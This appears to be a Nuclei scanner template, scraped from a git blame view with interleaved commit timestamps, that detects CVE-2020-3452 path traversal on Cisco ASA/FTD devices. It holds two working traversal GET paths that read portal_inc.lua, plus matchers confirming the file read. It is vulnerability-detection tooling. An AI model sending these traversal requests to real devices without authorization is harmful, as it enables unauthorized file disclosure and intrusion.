2021-01-02 04:56:15 +00:00
|
|
|
id: CVE-2020-3452
|
2020-07-22 19:29:49 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: CVE-2020-3452
|
|
|
|
author: pdteam
|
|
|
|
severity: medium
|
2021-02-05 19:44:41 +00:00
|
|
|
reference: https://twitter.com/aboul3la/status/1286012324722155525
|
|
|
|
tags: cve,cve2020,cisco,traversal
|
2020-07-22 19:29:49 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
|
2020-10-07 10:03:36 +00:00
|
|
|
- "{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"
|
2020-07-22 19:29:49 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "INTERNAL_PASSWORD_ENABLED"
|
|
|
|
- "CONF_VIRTUAL_KEYBOARD"
|
|
|
|
condition: and
|